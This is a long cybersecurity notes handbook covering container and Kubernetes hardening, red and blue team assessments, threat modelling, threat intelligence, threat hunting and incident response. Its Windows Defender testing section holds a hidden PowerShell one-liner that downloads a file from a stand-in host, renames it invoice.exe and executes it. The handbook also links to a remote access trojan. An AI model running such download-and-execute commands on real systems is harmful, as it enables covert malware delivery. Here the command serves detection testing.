Microsoft Application Inspector is a software source code analysis tool that helps identify and surface well-known features and other interesting characteristics of source code to aid in determining what the software is or what it does. It has received attention on ZDNet, SecurityWeek, CSOOnline, Linux.com/news, HelpNetSecurity, Twitter and more and was first featured on Microsoft.com.

Application Inspector is different from traditional static analysis tools in that it doesn’t attempt to identify "good" or "bad" patterns; it simply reports what it finds against a set of over 400 rule patterns for feature detection including features that impact security such as the use of cryptography and more. This can be extremely helpful in reducing the time needed to determine what Open Source or other components do by examining the source directly rather than trusting to limited documentation or recommendations.

The tool supports scanning various programming languages including C, C++, C#, Java, JavaScript, HTML, Python, Objective-C, Go, Ruby, PowerShell and more and can scan projects with mixed langauge files. It also includes HTML, JSON and text output formats Link: https://github.com/microsoft/ApplicationInspector

15.3.2. PEpper

An open source tool to perform malware static analysis on Portable Executable Link: https://github.com/Th3Hurrican3/PEpper

15.4. Key & Secrets Management

Credentials/Key should never be stored within source code in clear text. Hence the use of Key Vaults is suggested.

16. System Security

All the servers that the distributed ledger platform runs on must be:

1. Hardened

2. Monitored for availability

3. Intrusion Detection/Intrusion Protection mechanisms deployed to protect from attacks coupled with SIEM for proactive defense.

4. Based on the security be in a DMZ

17. Security-as-Code

Process:

1. Test the source code

2. Test the code’s execution

3. Test the app’s infrastructure

4. Test the Infrastructure as Code

5. Monitor and protect access to "the app" and its data

6. Secure the software factory itself

Policy considerations

1. What gets tested? Fail build with critical vulns?

2. Who can approve exceptions?

3. Frequency of testing

4. Are containers and packages scanned?

5. Who reviews configurations?

6. Are templates required/enforced?

7. How is IaC testing and protection incorporated?

8. Who reviews/approves?

9. Inspecting E-W and N-S traffict/from containers, clusters, and pods

10. Separation of duties?

11. Common controls

18. Container Security

A container is a way to package application with all the necessary dependencies and configuration. It is a portable artifact, easily shared and moved around. Makes development and deployment more efficient.

Containers are layers of images. Mostly Linux Base Image, because of small size. Application goes on top.

18.1. Container Environment

A container environment consists of components that increase your attack surface.

1. Images

   1. Keep updated at all times

   2. Sign

2. Image Registry

   1. Private

   2. Monitor the registry

   3. Registry host server is secure

3. Runtime

   1. Good application security

   2. Monitor network protocols

   3. Monitor network payloads

   4. Monitor the host

4. Orchestration Platforms: manage container lifecycle (Kubernetes, Docker, OCP)

   1. Set limits on provileged users

   2. Set limits on amounts of privilege you provide

   3. Host running the orchestration platform

5. Host OS that manages the Docker Daemon and Docker Client

   1. Selinux

   2. Access control

   3. Monitor

18.2. Container Scanners

DockerBench tests containers OpenSCAP aqua synk sysdig

18.3. Container Monitoring

Prometheus

18.4. Firewall

Cilium

18.5. Kubernetes

How do I run my workloads securely in Kubernetes to:

1. Code frum untrusted registries

2. Vulnerabilities in tools of OS or code libraries

3. Bloated Base Images

Prevent it by:

1. Use approved lean images

2. Create list of trusted registires

3. Image Scanning

4. Do not run containers with root

5. Avoid running privileged pods

6. Set limits on cluster resources for containers

   1. Resource Quota, limits the number of resources or capacity of resources granted ..

7. Secure Communication between pods

   1. Network Policies

   2. Firewalls for Pods

   3. Namespaces, keep resources and teams seperate from each other

   4. Service Mesh, takes the logic of communication between services from app code to network layer

      1. mTLS

      2. Communication Rules

8. Securing Secrets Data

   1. Do not use as environment vars or hard coded

   2. By Default, secret data is stored in plaintext in etcd

      1. Restrict access to etcd data

      2. Encrypt etcd backups

      3. Run & Manage etcd outside the cluster

   3. K8s supports encryption at rest

   4. Use tools like HashiCorp Vault

9. Securing Access to K8s cluster

   1. Authentication

      1. Certificates in Kubernetes

      2. Client certificates for human users

      3. Service Accounts for non-human users

10. Securing Access t K8s cluster

    1. Do not use NodePort

    2. LoadBalancer is better

    3. Ingress - even better

Prometheus container should not be running as root.

19. Vulnerability Management Program

Red team-blue team exercises take their name from their military antecedents. The idea is simple: One group of security pros — a red team — attacks something, and an opposing group — the blue team — defends it. Originally, the exercises were used by the military to test force-readiness.

19.1. Deep vs Dark Web

Dark web is every resource where hackers & criminal underground engage with each other. Tor is a mechanism that is used as a transport for the dark web.

Source: https://heimdalsecurity.com/blog/deep-web-vs-dark-web-what-is-each/

19.2. Pastebin

19.3. Taxonomy

Taxonomy is important as it ensures industry standard terms are used when talking about vulnerabilities, threat actors, and reporting.

19.3.1. Attacks

19.3.1.1. Social Engineering Attacks

• Phishing The perpatrator send an email or text to the target, seeking valuable information

• Vishing The perpatrator makes a fradulent phone calls to the target, seeking valuable information

• Baiting Baiting attacks use a false promise to pique a victims’s curiosity. They lure users into a trap that steals their personal information.

• Quid pro quo The perpatratpr makes random calls to a company’s employees offering a service or a benefit in exchange for information or access

• Pretexting It is often initiated by a perpatrator pretending to need sensitive information from a victim so as to perform a critical task. The success rate of this attack heavily depends on the attackers ability to build trust.

• Watering Hole The perpetrator injects malicious code into the web pages that the targets visit. Once a victim visits the page on the compromised website, a backdoor Trojan is installed on thier computer.

19.3.2. Malware

A malware is any piece of software that was written with the intent of damaging devices, stealing data, and generally causing a mess. Viruses, Trojans, spyware, and ransomware are among the different kinds of malware.

Malware is often created by teams of hackers: usually, they’re just looking to make money, either by spreading the malware themselves or selling it to the highest bidder on the Dark Web. However, there can be other reasons for creating malware too — it can be used as a tool for protest, a way to test security, or even as weapons of war between governments.

• Adware Though not always malicious in nature, aggressive advertising software can undermine your security just to serve you ads — which can give other malware an easy way in. Plus, let’s face it: pop-ups are really annoying.

• Bots Bots is a soft for roBot. Bots are usually controlled remotely and work as a network.

• Keylogger It is one of the most dangerous threats to a PC user’s privacy. This type of malware installs itself as a result of clicking while browsing the Internet or downloading software. Keyloggers keep track of all of your keystrokes when you are using your PC and then transfers the information to a remote server. It is capable of recording all of your online conversations, emails, and password logins, as well as creating screenshots of all of your PC activity.

Keyloggers are not always in the form of malware or software; it can also be installed on your computer in the form of hardware through being placed between the plug on your keyboard and the entry port. Some keyloggers are legitimate applications such as those that record an employee’s PC activity during work hours. Other keyloggers are in the form of malicious software that is designed to perform criminal activity.

• Ransomware This kind of malware typically locks down your computer and your files, and threatens to erase everything unless you pay a ransom.

• Remote Access

• Rootkit

• Spyware No surprise here — spyware is malware designed to spy on you. It hides in the background and takes notes on what you do online, including your passwords, credit card numbers, surfing habits, and more.

• Trojans This kind of malware disguises itself as legitimate software, or is hidden in legitimate software that has been tampered with. It tends to act discreetly and create backdoors in your security to let other malware in.

• Virus Like their biological namesakes, viruses attach themselves to clean files and infect other clean files. They can spread uncontrollably, damaging a system’s core functionality and deleting or corrupting files. They usually appear as an executable file (.exe)

• Worm Worms infect entire networks of devices, either local or across the internet, by using network interfaces. It uses each consecutively infected machine to infect others.

19.4. Vulnerability Assessment

Vulnerability Assessment is designed to find vulnerabilities and assess to ensure they are not false positives. The next step is to remediate the vulnerability by patching the system, reconfiguring it, or implementing other controls to reduce the risk.

19.5. Penetration Testing

Penetration testing, or pen testing for short, is an authorized attack against your computer system to discover and exploit vulnerabilities. This activity is also known as ethical hacking.

Penetration testing is a technical control that is implemented to ensure the systems that are currently in production or are going to be production do not have any vulnerabilities that would allow threat vectors to exploit.

The Penetration Testing Execution Standard (PTES) provides the necessary guidelines on how to conduct penetration testing. More information can be found here: http://www.pentest-standard.org/index.php/Main_Page

Penetration Testing goes further than vulnerability assessment. After a vulnerability is identified, the tester attempts to exploit a vulnerability. This can be done numerous ways and, once a vulnerability is exploited, a good tester will not stop. They will continue to find and exploit other vulnerabilities, chaining attacks together, to reach their goal. Each organization is different, so this goal may change, but usually includes access to Personally Identifiable Information (PII), Protected Health Information (PHI), and trade secrets. Sometimes this requires Domain Administrator access; often it does not or Domain Administrator is not enough.

Penetration testing involves following steps: . Reconnaissance via open source intelligence (OSINT) gathering techniques. IT does not involve probing any or your devices, but gathering as much information publicly available about your environment using internet sources. . Scanning your network to identify active devices . Fingerprint active devices to identify operating system and applications installed . Find vulnerabilities for the services running on your systems . Exploiting those vulnerabilities . Once the vulnerability has been exploited, further probing the system to seek valuable information such as PII (Personally Identifiable Information) etc. . Try to further explore other systems on the network and exploit them if possible. . Produce a report that identifies vulnerabilities, which ones were exploited, what was the outcome of exploitation and suggest high level remediation steps.

There are three approaches to Penetration Tests: . Black Box: No knowledge of th infrastructure. . White Box: Full knowledge of the infrastructure. . Grey Box: Some knowledge of the infrastructure.

Penetration Tests can include following scopes: . External . Internal . Web application . Wireless . Cloud . Social

I have created a seperate document listing some of the Penetration Testing Tools that we have used.

19.5.1. Pentest Program

Establish a Pentest Program to ensure full coverage of assets and identify the depth of coverage needed for each asset.

19.5.2. Red team Assessment

A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization’s detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. The Red Team Assessment emulates a malicious actor targeting attacks and looking to avoid detection, similar to an Advanced Persistent Threat (APT). (Ugh! I said it…) Red Team Assessments are also normally longer in duration than Penetration Tests. A Penetration Test often takes place over 1-2 weeks, whereas a Red Team Assessment could be over 3-4 weeks or longer, and often consists of multiple people.

A Red Team Assessment does not look for multiple vulnerabilities but for those vulnerabilities that will achieve their goals. The goals are often the same as the Penetration Test. Methods used during a Red Team Assessment include Social Engineering (Physical and Electronic), Wireless, External, and more. A Red Team Assessment is NOT for everyone though and should be performed by organizations with mature security programs. These are organizations that often have penetration tests done, have patched most vulnerabilities, and have generally positive penetration test results.

The Red Team Assessment might consist of the following:

A member of the Red Team poses as a Fed-Ex delivery driver and accesses the building. Once inside, the Team member plants a device on the network for easy remote access. This device tunnels out using a common port allowed outbound, such as port 80, 443, or 53 (HTTP, HTTPS, or DNS), and establishes a command and control (C2) channel to the Red Team’s servers. Another Team member picks up the C2 channel and pivots around the network, possibly using insecure printers or other devices that will take the sights off the device placed. The Team members then pivot around the network until they reach their goal, taking their time to avoid detection.

This is just one of innumerable methods a Red Team may operate but is a good example of some tests we have performed.

• Offensive Security

• Ethical Hacking

• Exploiting Vulnerabilities

• Penetration Testing

• Black Box Testing

• Social Engineering

• Web App Scanning

19.5.2.1. Red Team Resources

1. https://www.hackingarticles.in/red-teaming/

19.5.2.1.1. Remote Access Trojan (RAT)

Link: https://github.com/b4rtik/RedPeanut

19.5.3. Blue Team Assessment

Blue team assessment is usually a test of the teams' ability to identify and defend the network while under attack by the Red Teams/Penetration Tester/Hacker.

• Defensive Security

• Infrastructure Protection

• Damage Control

• Incident Response

• Operational Security

• Threat Hunters

• Digital Forensics

19.5.3.1. Powershell to test Windows Defender

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'

19.5.4. Purple Team

• Collaborative Security

• Reand & Blue Teams Function Together

• Cooperate to improve/test detection

• Vulnerability Scanning & Pen Testing

19.5.5. Security Defense Modeling

19.5.5.1. Cyber Kill Chain

The Cyber Kill Chain® is a security defense model developed by Lockheed Martin. It aims to identify and stop sophisticated cyberattacks before they impact an organization. Let’s explore its key aspects:

1. Purpose and Origin:

   • The Cyber Kill Chain® was initially created by Lockheed Martin in 2011.

   • Its purpose is to bolster an organization’s defenses against advanced persistent threats (APTs)—sophisticated cyberattacks.

   • The concept draws inspiration from military operations, where enemy attacks are broken down into stages, and preventive measures are implemented.

2. Seven Stages of the Cyber Kill Chain®:

   • The Cyber Kill Chain® divides an attack into seven stages:

     1. Reconnaissance: Gathering information about the target.

     2. Weaponization: Creating or acquiring malware.

     3. Delivery: Delivering malware to the victim (e.g., via email attachments).

     4. Exploitation: Exploiting vulnerabilities to gain access.

     5. Installation: Installing malware on the victim’s system.

     6. Command and Control: Establishing communication channels.

     7. Actions on Objectives: Achieving the attack goals.

3. Benefits and Caution:

   • By breaking down the attack process, the Cyber Kill Chain® allows security teams to recognize, intercept, or prevent attacks.

   • When used correctly, it enhances incident management and response.

   • However, if misapplied, it can put organizations at risk.

   • Some shortcomings in the kill chain have led to questions about its future.

4. Comparison with MITRE ATT&CK:

   • The Cyber Kill Chain® is often compared to the MITRE ATT&CK framework.

   • While both illustrate phases of a cyberattack, MITRE ATT&CK provides a broader view of adversary behaviors and techniques.

   • Unlike the specific grouping and linear structure of the kill chain, MITRE ATT&CK lists tactics without a particular order.

In summary, the Cyber Kill Chain® helps organizations stay ahead of hackers by understanding and defending against attacks at every stage—from conceptualization to execution. While it’s not a threat modeling framework per se, it plays a crucial role in cybersecurity strategy¹².

Sources

1. Cyber Kill Chains Explained: Phases, Pros/Cons & Security Tactics. https://www.splunk.com/en_us/blog/learn/cyber-kill-chains.html.

2. What Is the Cyber Kill Chain? - Proofpoint. https://bing.com/search?q=is+cyber+kill-chain+a+threat+modeling+framework.

3. What Is the Cyber Kill Chain? Definition & Steps | Proofpoint AU. https://www.proofpoint.com/au/threat-reference/cyber-kill-chain.

4. What Is the Cyber Kill Chain? - Proofpoint. https://www.proofpoint.com/us/threat-reference/cyber-kill-chain.

5. What Is The Cyber Kill Chain? Process & Model. https://securityboulevard.com/2023/11/what-is-the-cyber-kill-chain-process-model/.

19.5.6. Methods

social engineering, phishing, vishing or simply posing as a company employee.

19.6. Threat Modeling

Threat modeling is a process by which potential threats, such as structural vulnerabilities can be identified, enumerated, and prioritized – all from a hypothetical attacker’s point of view. The purpose of threat modeling is to provide defenders with a systematic analysis of the probable attacker’s profile, the most likely attack vectors, and the assets most desired by an attacker. Threat modeling answers the questions “Where are the high-value assets?” “Where am I most vulnerable to attack?” “What are the most relevant threats?” “Is there an attack vector that might go unnoticed?

It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application. Threat modeling is not an approach to reviewing code, but it does complement the security code review process.

Some great information here Threat Modeling Manifesto

19.6.1. MITRE ATT&CK

MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cyber security product and service community.

With the creation of ATT&CK, MITRE is fulfilling its mission to solve problems for a safer world — by bringing communities together to develop more effective cybersecurity. ATT&CK is open and available to any person or organization for use at no charge.

Here are the key points about ATT&CK:

1. Foundation for Threat Models: MITRE ATT&CK serves as a foundation for developing specific threat models and methodologies in various sectors, including the private sector, government, and the cybersecurity industry. It helps organizations understand their security readiness and uncover vulnerabilities in their defenses¹².

2. Adversarial Tactics and Techniques: ATT&CK catalogs a comprehensive set of adversarial tactics and techniques. These include the methods, procedures, and approaches used by cybercriminals during different phases of an attack lifecycle.

3. Open and Accessible: MITRE ATT&CK is open-source and freely available to any person or organization. It encourages collaboration and knowledge sharing across the cybersecurity community.

4. Matrix for Enterprise: The ATT&CK matrix organizes tactics and techniques into categories such as Reconnaissance, Execution, Privilege Escalation, Lateral Movement, and more. Each technique provides detailed information on how adversaries operate and the platforms they target¹.

In summary, MITRE ATT&CK empowers organizations to better understand and defend against cyber threats by providing a structured framework based on real-world observations of adversary behavior¹³⁴.

Sources

1. MITRE ATT&CK®. https://attack.mitre.org/.

2. What Is MITRE ATT&CK - Definition | VMware Glossary. https://www.vmware.com/topics/glossary/content/mitre-attack.html.

3. What is the MITRE ATT&CK Framework? | IBM. https://www.ibm.com/topics/mitre-attack.

4. What Is the MITRE ATT&CK Framework? | Get the 101 Guide | Trellix. https://www.trellix.com/security-awareness/cybersecurity/what-is-mitre-attack-framework/.

19.6.1.1. Relationship between Tactics & Techniques

The relationship between tactics and techniques in the MITRE ATT&CK framework:

1. Tactics:

   • Tactics represent the highest-level objectives of an attacker. They provide insight into why an adversary is performing specific actions.

   • Each tactic corresponds to a strategic goal or intent. For example, an adversary might aim to achieve credential access, establish persistence, or perform lateral movement.

   • Think of tactics as the strategic phases an attacker goes through during an attack lifecycle.

2. Techniques:

   • Techniques represent how an adversary achieves their tactical goals. They describe the specific actions and methods used.

   • Each technique corresponds to a specific way an adversary operates. For instance:

   • Initial Access Techniques: These involve gaining the first foothold into a target environment (e.g., drive-by compromise or spear phishing).

   • Defense Evasion Techniques: These focus on bypassing or evading security controls (e.g., using fileless storage).

   • Techniques provide granularity and specificity when describing attacker behavior.

3. Layered Structure:

   • The relationship between tactics and techniques can be visualized as a layered structure:

   • An initial tactic is associated with one or more techniques.

   • Each technique, in turn, comprises a set of procedures (specific actions taken by the adversary).

4. TTP: Tactic, Technique, Procedure:

   • The layering from general tactics down to specific procedures gives rise to the concept of TTP:

   • Tactic: The overarching objective.

   • Technique: The method used to achieve the tactic.

   • Procedure: The detailed steps within a technique.

In summary, MITRE ATT&CK goes beyond describing attack stages; it models specific attacker actions, motivations, and the interplay between tactics and techniques. Understanding this relationship helps defenders better prepare and respond to cyber threats¹²³.

Sources . What is the MITRE ATT&CK Framework? - An Easy Guide - SentinelOne. https://www.sentinelone.com/cybersecurity-101/mitre-attack-framework/. . What is the MITRE ATT&CK Framework? | IBM. https://www.ibm.com/topics/mitre-attack. . FAQ | MITRE ATT&CK®. https://attack.mitre.org/resources/faq/.

19.6.2. Threat Scoring and Databases

19.6.2.1. CVSS

CVSS stands for Common Vulnerability Scoring System, which provides a score to indicate the severity of the CVE vulnerabilities.

Assignment of a CVSS score is based on:

• The primary impact on the confidentiality, integrity, and availability of the protected system/resources

• The derivative impact on loss of life and/or properties

• The percentage of the impacted area within the total environment

• How easy it is to exploit the vulnerability

• How easy it is to remediate the vulnerability

• How confident the testing team is about the existence of the vulnerability

19.6.2.2. NVD

National Vulnerability Database (NVD) is the U.S. government repository of standards based vulnerability management data. NVD also provides severity rankings of "Low," "Medium," and "High" in addition to the numeric CVSS scores. These qualitative rankings are simply mapped from the numeric CVSS scores:

• Vulnerabilities are labeled "Low" severity if they have a CVSS base score of 0.0-3.9.

• Vulnerabilities will be labeled "Medium" severity if they have a base CVSS score of 4.0-6.9.

• Vulnerabilities will be labeled "High" severity if they have a CVSS base score of 7.0-10.0

19.6.3. STRIDE

STRIDE is a model of threats developed by Praerit Garg and Loren Kohnfelder at Microsoft[1] for identifying computer security threats.[2] It provides a mnemonic for security threats in six categories.[3]

The threats are:

• Spoofing of user identity

• Tampering

• Repudiation

• Information disclosure (privacy breach or data leak)

• Denial of service (D.o.S)

• Elevation of privilege.

19.6.4. DREAD

DREAD methodology is used to rate, compare and prioritize the severity of risk presented by each threat that is classified using STRIDE.

• Damage

• Reproducibility

• Exploitability

• Affected Users

• Discoverability

DREAD Risk = (Damage + Reproduciblity + Exploitability + Affected Users + Discoverability) / 5. Calculation always produces a number between 0 and 10. Higher the number means more serious the risk is.

Following is a customized mathematical approach to implement DREAD methodology:-

Damage Potential If a threat exploit occurs, how much damage will be caused?

• 0 = Nothing

• 5 = Information disclosure that could be used in combination with other vulnerabilities

• 8 = Individual/employer non sensitive user data is compromised.

• 9 = Administrative non sensitive data is compromised.

• 10 = Complete system or data destruction.

• 10 = Application unavailability.

Reproducible How easy is it to reproduce the threat exploit?

• 0 = Very hard or impossible, even for administrators of the application.

• 5 = Complex steps are required for authorized user.

• 7.5 = Easy steps for Authenticated user

• 10 = Just a web browser and the address bar is sufficient, without authentication.

Exploit-ability What is needed to exploit this threat?

• 2.5 = Advanced programming and networking knowledge, with custom or advanced attack tools.

• 5 = Exploit exits in public, using available attack tools.

• 9 = A Web Application Proxy tool

• 10 = Just a web browser

Affected Users How many users will be affected?

• 0 = None

• 2.5 individual/employer that is already compromised.

• 6 = some users of individual or employer privileges, but not all.

• 8 = Administrative users

• 10 = All users

Discover-ability How easy is it to discover this threat?

• 0 = Very hard requires source code or administrative access.

• 5 = Can figure it out by monitoring and manipulating HTTP requests

• 8 = Details of faults like this are already in the public domain and can be easily discovered using a search engine.

• 10 = the information is visible in the web browser address bar or in a form.

DREAD methodology can be customized to cater the needs of your application, during consultancy engagements it should be approved from the client before starting the security assessment so that after you perform the analysis the results produced by DREAD couldn’t be challenged.

19.7. Threat Intelligence

This is the key methodology that every cyber security practictioner should be familiar with. It ensures that one stays in sync with all the activites of threat actors and use that information to proactively protect their environments.

19.7.1. Search Engines

19.7.2. IoT

19.7.3. Open Threat Exchange(OTX)

Open Threat Exchange (OTX) is a crowd-sourced computer-security platform that fosters collaboration and information sharing among cybersecurity experts, organizations, and researchers. Here are the key points about OTX:

1. Community-Driven Intelligence: OTX is an open-source initiative developed by AlienVault (now part of AT&T Cybersecurity). It serves as a centralized repository where participants from over 180,000 organizations across 140 countries share valuable threat information.

2. Daily Threat Sharing: Participants contribute and exchange more than 19 million potential threats daily. The platform covers a wide range of security-related topics, including viruses, malware, intrusion detection, and firewalls.

3. Free to Use: OTX is freely accessible to all users. Its goal is to democratize threat intelligence and empower organizations to enhance their cybersecurity defenses.

4. Components and Features:

   • Data Cleansing and Aggregation: OTX’s automated tools cleanse, aggregate, validate, and publish data shared by participants.

   • Anonymity: Shared data is validated and stripped of identifying information to protect contributors' privacy.

   • Social Network: OTX 2.0 introduced a social network feature, enabling members to discuss and research security threats in real time.

   • Threat Feeds: Users can share IP addresses or websites associated with attacks and explore existing threat information.

   • Pulses: OTX provides detailed threat analyses (called "Pulses") that include data on Indicators of Compromise (IoC), impact, and targeted software. These Pulses can be exported in various formats (STIX, JSON, OpenIOC, MAEC, CSV) and used to update local security products.

   • Community Interaction: Users can up-vote and comment on specific Pulses, helping others identify critical threats.

   • Integration with Security Products: OTX integrates with major security products, including firewalls and perimeter security hardware.

   • Automated Data Extraction: The platform extracts relevant information from security reports in various formats (PDF, CSV, JSON).

5. Private Communities: In 2016, AlienVault enhanced OTX, allowing participants to create private communities and discussion groups. These groups facilitate in-depth discussions on specific threats, industries, and regions.

In summary, OTX acts as the "neighborhood watch" for the global intelligence community, promoting greater security by openly sharing information about emerging threats, attack methods, and malicious actors¹²³.

Sources

1. Open Threat Exchange - Wikipedia. https://en.wikipedia.org/wiki/Open_Threat_Exchange.

2. Open Threat Exchange (OTX): Enhancing Cybersecurity with …​ - Medium. https://medium.com/@paritoshblogs/open-threat-exchange-otx-enhancing-cybersecurity-with-collaborative-threat-intelligence-33f1ae6dbcb9.

3. LevelBlue - Open Threat Exchange. https://otx.alienvault.com/.

19.7.4. Palo Alto Unit42

Unit 42 is the global threat intelligence team at Palo Alto Networks®

1. Palo Alto Unit42 website: https://unit42.paloaltonetworks.com/

2. Playbook: https://pan-unit42.github.io/playbook_viewer/

https://www.packetstormsecurity.com https://www.securityfocus.com https://www.exploit-db.com

19.7.5. Cisco Talos

Cisco Talos Intelligence Group is one of the largest commercial threat intelligence teams in the world, comprised of world-class researchers, analysits and engineers. These teams are supposed by unrivaled telemetry and sophisticated systems to create accurate, rapid and actionable threat intelligence for Cisco Customers, products and services. Talos defends Cisco customers against knowns and emerging threats, discovers new vulnerabilities in common software, and interdicts threats in the wild beofre they can further harm the internet at large. Talos maintains the official rules sets of Snort.org, ClamAV, and SpanCop, in addition to releasing many open-source research and analysis tools.

Talos was formed by combining SourceFire’s Vulnerability Research Team, the Cisco Threat Research and Communications group, and the Cisco Security Applications Group. The combined expertise is backed by a sophisticated infrastrucutre, and Cisco’s unrivaled telemetry of data that spans across networks, endpoints, cloud environments, virtual systems, and daily web and email traffic.

Link: https://talosintelligence.com/

19.7.6. Sophos Labs

Link: https://www.sophos.com/en-us/labs.aspx

19.7.7. STIX

STIX (Structured Threat Information eXpression) was originally conceived as a language to describe cyber threat intelligence. This was groundbreaking at the time because it was the first language to provide a definition of cyber threat intelligence. Although it’s a bit of a fuzzy term, cyber threat intelligence generally describes information about adversaries and their behaviors that can inform defensive actions. For example, knowing that a certain adversary targets financial institutions by using specially crafted spear-phishing emails, and then delivers Trojans that will reach out to a certain set of websites that are known to be malicious, can be very helpful in defending against the attack. STIX captures that type of intelligence in a machine-readable form so that it can be shared among organizations and tools.

The DHS Office of Cybersecurity and Communications funded MITRE, beginning in 2012, to act as the technical developer of STIX and serve as a community facilitator to jumpstart STIX. Once some level of maturity was reached, STIX would be transitioned to an international standards body. That goal was realized in 2015 when governance of STIX was transitioned to OASIS, an international standards consortium. This was a big step for STIX and a big success for DHS, MITRE, and the community because it meant that STIX was on its way to becoming an international standard. Although DHS and MITRE continue to serve in several leadership positions in the CTI TC, the majority of the leadership and the vast majority of participants in the TC are from industry. In fact, the OASIS CTI TC was founded with more participants than any other TC in OASIS history. It’s that community that led the development of STIX 2.0.

19.7.8. TAXII

TAXII is a high-level protocol for moving cyber threat intelligence (primarily STIX) data around between systems and tools. We expect that, within the coming months, TAXII will be achieving this same milestone and opening its own public review period.

If you’re interested in learning more about STIX 2.0 or TAXII 2.0, the documentation page is the best place to start.

19.7.9. Tools

19.7.9.1. MISP

MISP - Open Source Threat Intelligence Platform & Open Standards For Threat Information Sharing

Link: https://www.misp-project.org/

19.8. Threat Hunting

Threat hunting is a relatively new focal area in information security. Actively looking for C2C in your environment. Firewalls, IDS/IPS, SIEM are not able to detect C2C.

Beacons Looking for persistent outbound signal * Is there consistency in timing *

19.8.1. Sysmon

Microsoft Sysinternals Sysmon configuration repository, set up modular for easier maintenance and generation of specific configs. link: https://github.com/olafhartong/sysmon-modular

19.8.2. Detecting C2 over DNS

• Capture all DNS traffic

  • Capture tool of your choice

  • Longer the capture time, the better

• Filter so it is DNS traffic only

• Extract to text so we can sort and count

• Review total FQDNs per domain

• Check domain with a lot of FQDNs

19.8.3. RITA

Link: https://www.activecountermeasures.com/free-tools/rita/

19.8.4. Tshark

tshark -q -z conv,ip -r dnscat2.pcapng | tr -s ' ' | cut -d " " -f 1,2,3,10 | sort -k 4 -rn | head

tshark -r thunt-lab.pcapng -T fields -e dns.qry.name | sort |uniq | rev | cut -d '.' -f 1-2 |rev | uniq -c | sort -rn | head -10

19.8.5. Zeek

Network sniffing tool, formerly called Bro.

19.8.6. Reference Sites

1. https://pentestmag.com/using-the-mitre-attck-navigator-for-intelligence-gathering-pre-purple-teaming/

2. https://www.activecountermeasures.com/raspberry_pi_sensor/

3. https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClarCAC

4. https://gist.github.com/MSAdministrator/7a61025263e279a740835da4b205e6d0

5. https://www.twistlock.com/2019/01/02/whitelisting-blacklisting-security-strategy/

6. https://en.wikipedia.org/wiki/Domain_fronting

7. https://www.bleepingcomputer.com/news/security/teamviewer-confirms-undisclosed-breach-from-2016/

8. https://www.linkedin.com/posts/kirtaroza_cyberthreatintelligence-note-paython-activity-6600672896148959232-J-r8/

9. https://github.com/activecm/passer

10. http://www.stearns.org/doc/pcap-apps.html

11. HELKS

12. SELKS

13. Packet Squirrel https://shop.hak5.org/products/packet-squirrel

14. https://register.gotowebinar.com/register/2540509980495221261?source=ACMtwitter

15. netgear gs305e

19.9. Threat Risk Assessments

Threat: Any potential actor that has the capability, motivation, or intent to exploit a vulnerability. Vulnerability: Is a weakness that allows a threat to compromise the security of a system.

Risk: Likelihood of a threat source to exploit a vulnerability to target a critical asset and impact a business negatively. Controls, safeguards, countermeasures are implemented to reduce the risk.

19.10. Bug Bounty / Crowsourced Security Platforms

1. Hackerone

2. Bugcrowd

3. Synack

4. Detectify

5. cobalt

6. Open Bug Bounty

7. Zerocopter

8. YesWeHack

9. HackenProof

10. Vulnerability Lab

11. FireBounty

12. BugBounty.jp

13. AntiHACK

14. Intigriti

15. SafeHats

16. RedStorm

17. Cyber Army ID

18. Yogosha

20. DFIR-Digital Forensics & Incident Response

Here is a list of DFIR Tools that can be used when responding to incidents.

Use Security Threat Assessment & Incident Response Report Template to establish an incident timeline and remeidation.

20.1. Preparation

1. Know your tools, practise, practise, practise

2. Have procedures on when and how to use your tools

3. There are differences on how to respond to an incident based on based on environment, hence ensure you are familiar with the environment and know which tools to use. You should have a playbook for each environment. Some to of environments are:

   1. On Premise

   2. Azure

   3. GCP

   4. AWS

   5. Other cloud provider

20.2. During the Incident

1. Secure the impacted environment to ensure no one but Incident Responders only

2. Document every activity during the incident in a log to ensure you have a timeline

3. Dump the memory using following tools(this is not an exhaustive list):

   1. PMEM

   2. FTKIMAGER

4. Decide which logs do you need to conduct your analysis, for example:

   1. Active Directory Logs if you are an AD Shop, 99% environments today are.

   2. File Server Logs

   3. Web Server Logs

   4. Application Server Logs

   5. Database Server Logs

   6. Firewall Logs

   7. Switch Logs

   8. Router Logs

   9. Access Point Logs

20.3. Playbooks

20.3.1. Windows Persistence

Focus on System & Security logs. Standard artifact utilized in any investigation.

Following log types are important:

1. Task logs

2. Events concerning services

   1. 7045 - Code for new service installed, should be a low frequency event.

   2. 7009 - Service failed to start, what should be running and is not.

   3. 7035/7036 - Services being tampered with for malicious purposes. Look for services that have no descrption, and have image path that is in a non standard directory. DLL is in the same directory as exe, which is a side loading technique. Check for start type, if it is changed to 2, which is auto start. Type 10 means that the service is running under user account authority.

   4. 601 - Attempt to install a service

   5. 7034 - Service has crashed unexpectedly

3. Events concerning schedules tasks

   1. 4698 - When a scheduled task is created on a system that has been compromised

   2. 4702 - When a scheduled task has been altered

   3. 4701/4699

   4. 4700 - A scheduled task has been enabled.

Scheduled tasks with abnormal names or directories. Attackers usually create a verly long task name. Check the command syntax.

21. Enterprise Architecture

Source: https://www.youtube.com/watch?v=NUD-LXUE4tM

Enterprise is any organization that is large or small with a collaborative collection of sub-organizations with a shared set of objectives.

Architecture is a designed structure of something. A description of the structure (components) and behaviors (Processes) of a system. It is also an activity required to produce such a description.

Enterprise Architecture is documentation describing the structure and behaviour of an enterprise including its information systems. Also a process for describing an enterprise(including its information systems), then planning and governing changes to improve the integrity and flexibility of the enterprise.

Frameworks provide guidelines on how to implement enterprise architecture. Frameworks address following areas: * Content (strcuture, metamodel) * Process (activities) * Organization (roles, people)

Some of the frameworks are:

• TOGAF (covers all three, content, process, and organization)

• SABSA

• Zachman (Purely covers content)

• DODAF

• MODAF

Large organizations are complex, hence they can be broken down into following typical domains

